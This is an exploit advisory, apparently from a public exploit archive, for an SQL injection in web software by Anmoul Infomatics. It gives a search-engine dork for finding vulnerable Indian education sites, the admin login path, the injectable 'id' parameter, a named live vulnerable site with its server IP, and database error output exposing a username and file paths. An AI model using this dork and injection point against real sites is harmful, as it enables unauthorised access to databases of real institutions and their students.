facebook facebook twitter rss

Anmoul Infomatics Pvt. Ltd India SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
#############################################################

# Exploit Title : Anmoul Infomatics Pvt. Ltd India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : anmoul.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Powered By Anmoul Infomatics Pvt. Ltd'' site:edu.in
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

#############################################################

# Admin Panel Login Path :
************************

/admin/

# SQL Injection Exploit :
************************

/src/db_conn.php?id=[SQL Injection]

#############################################################

# Example Vulnerable Site =>
***************************

Note => (192.163.245.86) => There are 141 domains hosted on this server.

[+] dbmsdca.edu.in/src/db_conn.php?id=12%27 =>

[ Proof of Concept ] => archive.fo/xuBFL

#############################################################

# SQL Database Error :
**********************

Warning: mysql_pconnect(): Access denied for user
'dbmsdcae_user'@'localhost' (using password: YES) in
/home2/dbmsdcaedu/public_html/src/db_conn.php on line 7
Error connecting to database.
Warning: mysql_select_db(): Access denied for user
''@'localhost' (using password: NO) in /home2/dbmsdcaedu
/public_html/src/db_conn.php on line 12

Warning: mysql_select_db(): A link to the server could
not be established in
/home2/dbmsdcaedu/public_html/src/db_conn.php on line 12

Warning: mysql_connect(): Access denied for user
'dbmsdcae_user'@'localhost' (using password: YES) in
/home2/dbmsdcaedu/public_html/src/db_conn.php on line 18

Warning: mysql_select_db(): Access denied for user
''@'localhost' (using password: NO) in /home2/dbmsdcaedu
/public_html/src/db_conn.php on line 19

Warning: mysql_select_db(): A link to the server could not be
established in /home2/dbmsdcaedu/public_html/src
/db_conn.php on line 19

#############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#############################################################

Like us on Facebook :